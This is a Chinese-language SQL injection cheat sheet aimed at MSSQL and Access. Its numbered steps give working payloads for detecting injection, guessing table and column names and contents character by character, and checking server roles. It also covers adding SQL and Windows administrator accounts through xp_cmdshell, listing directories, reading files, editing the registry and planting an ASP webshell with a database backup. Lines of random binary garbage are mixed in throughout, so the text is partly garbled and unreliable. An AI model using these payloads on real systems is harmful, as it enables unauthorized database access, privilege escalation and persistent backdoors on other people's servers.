1.判断是否有注入;and 1=1 ;and 1=2 r��~s03g0�
2.初步判断是否是mssql ;and user>0 n;�rOH�[�P
F$ h�/��k^
3.注入参数是字符'and [查询条件] and ''=' M�cs�qMI6
*� ��n!0��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ^|��sxb��P
VDnAQ[�T@d
5.判断数据库系统 E�#ys-t 42
2:Dp�nL�U5
;and (select count(*) from sysobjects)>0 mssql C�)C;U&�Qd
wFqz.��HoB
;and (select count(*) from msysobjects)>0 access mOX�I"q�]p
�b�1�*6�)
oub4/0tN,~
D �0�n2r��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 &tRnI�$D�
q',a�7Tf�:
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8%�xtb6#7M
��#kb(2�Td
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 !-MG"\#�Wq
1~`�g�fHI4
9.(1)猜字段的ascii值(access) ]��lO$�oO�
v�Y;��Lc��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 J�R<R8+@g_
PPq*�_�Cf�
(2)猜字段的ascii值(mssql) ��%A�NPv�=
r*p�%�e\ 3
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 NX=dx&i�>+
��.`h+�fqa
10.测试权限结构(mssql) O3BU.X1'%�
l%w�7��N9�
WG��}QLcP�
@pS[_!EqYz
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- s+CXKb� �+
�8c/Ii"��1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 8 Z�j>�|�u
7�3<iK]*c�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ',�&MY�m�\
!<��X_�XA�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- J2cNw��h�Z
$\K�(EBi#G
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- v�Cmh3TQ��
:�<(<tz7dj
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �(CV=�0{�]
~Igo
8yk�l
;and 1=(select IS_MEMBER('db_owner'));-- RI*%\~6t?
���rF�K
*�
�C4cg�,>P7
z`�2d(KE?
11.添加mssql和系统的帐户 kt:%]ZZL�
6?iP� z?5�
;exec master.dbo.sp_addlogin username;-- dk]ro�~ �[
;exec master.dbo.sp_password null,username,password;-- Lul?@�>T��
VN"�.N��EL
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Ce�)�W�vuh
, �X�R8qi~
;exec master.dbo.xp_cmdshell 'net user username password P4Ad�fHk��
�7>��mY�D3
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ,Z^GN%Q�7a
h/�VYH�(Tj
;exec master.dbo.xp_cmdshell 'net user username password /add';--
C��F��A�>
�2M1mdk�P3
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��ky�%%H;�
.R"L$V$RU.
A&7j�E:E�w
`&6]P�:_qp
12.(1)遍历目录 :�)yM�9^<D
^KF'/�9S�
;create table dirs(paths varchar(100), id int) S\�r�f�R N
�;lE�iOF+d
;insert dirs exec master.dbo.xp_dirtree 'c:\' lpM�{@��JC
S��m�u�x&e
;and (select top 1 paths from dirs)>0 �fh���3
6
$3Ia�+O ��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) gc:>HX�);)
s�yfR5��wc
qs b4@�jt+
>�dGY�ZfqD
(2)遍历目录 4�>HGwk@+8
sP
��|�i�'
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- OE"B�b����
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 *Wa��u��7
����M:$�nL
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 O�g�npz�N
K!~�](_W!
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �?n+\�T'f!
q<��8HG_��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Z�}C�%%2Iz
[<;2�C����
�`7�A@\Ha3
"8��]17��0
13.mssql中的存储过程 �c �1GP3�
B�;Z^.��3�
xp_regenumvalues 注册表根键, 子键 f5-={lUlIS
FHC7\#p/9Z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��E=QQZ\w�
(Vv�]�:�Y]
xp_regread 根键,子键,键值名 /0ui�n���x
��eH8�.�O�
;exec xp_regread mTg�n�}rXk
@��$���R a
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ;$Jvqq�|�T
q}i�87�a;m
xp_regwrite 根键,子键, 值名, 值类型, 值 �!/zj7z�
!
��B" z�5j
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 hH/���O�2�
g <�o��;\\
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 V�LN3x�.BY
co8�0�M�;4
xp_regdeletevalue 根键,子键,值名 :�\OvV��S/
~�dL�Z[�6Z
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 1aG}�-:$t'
ZM?r�1��Z4
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 }"C�n k��g
�v],�DBw9
>cb�
g�L%�
WXU6�J?tIm
14.mssql的backup创建webshell F! e�`i-xt
��T�bVL71c
use model U'�G�`�Q0n
QEKFuY<E+�
create table cmd(str image); h�)�vTu%J:
��xn8B|axB
insert into cmd(str) values (''); �LH;�G��:�
8|GpfW3p�2
backup database model to disk='c:\l.asp'; W�V
U9NmvE
�1n"X?K5;A
&L]*]Xz��;
7p��$*/5fk
15.mssql内置函数 #O+]��ydvT
9�a%�@j�
]
;and (select @@version)>0 获得Windows的版本号 <UdD@(iZ#�
�`�qz5rPyZ
;and user_name()='dbo' 判断当前系统的连接用户是不是sa .*blM1+6i/
*�Rh .s!@4
;and (select user_name())>0 爆当前系统的连接用户 !�.$P`w�Kr
[#Vr)�\�n�
;and (select db_name())>0 得到当前连接的数据库 �pQ{t�< �>
w�"i�Z���n
I+�t38�un%
T}[vfIJ�D
16.简洁的webshell C>dJ�:.K%H
�ooS��d6;'
use model Dt.W�b&V_w
:,,y�63-f4
create table cmd(str image); �%�
cdP�*
�Q�{hOn]�"
insert into cmd(str) values (''); n�0p�e7/Ai
V�B�J]d��|
backup database model to disk='g:\wwwtest\l.asp';
